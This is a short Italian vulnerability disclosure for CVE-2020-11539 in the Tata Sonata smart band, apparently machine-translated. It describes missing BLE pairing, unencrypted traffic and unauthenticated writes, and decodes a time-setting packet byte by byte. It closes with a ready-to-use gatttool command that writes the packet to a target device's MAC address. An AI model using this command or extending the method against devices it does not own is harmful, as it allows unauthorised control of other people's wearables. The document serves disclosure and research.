
Controllo di accesso improprio in Tata Sonata Smartband
Descrizione: È stato identificato che il smart band non ha pairing (modalità 0 livello di sicurezza BLE). I dati trasmessi via etere non sono crittografati. Inoltre, i dati inviati al smart band non hanno alcuna autenticazione o verifica della firma, consentendo a qualsiasi attaccante di controllare i parametri del dispositivo.
Versioni interessate: Smart SF Rush - 1.12
Ricercatore: Sayli Ambure (https://twitter.com/sayli_ambure)
Link MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
Il seguente pacchetto è stato invertito e trovato per cambiare l'ora; è possibile invertire più pacchetti estraendo il dump hcisnoop dal tuo telefono.
Valore dati: 00870e00141401060712052b051e
| Hexdump dati: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Dati decimali: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: Intestazione del pacchetto
0e 00: Tipo di pacchetto
14 14: Anno in esadecimale (2020)
01 06: Mese e giorno (6 gennaio)
07 12: Ora e minuti in esadecimale (07:18 AM)
05 : Secondi
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e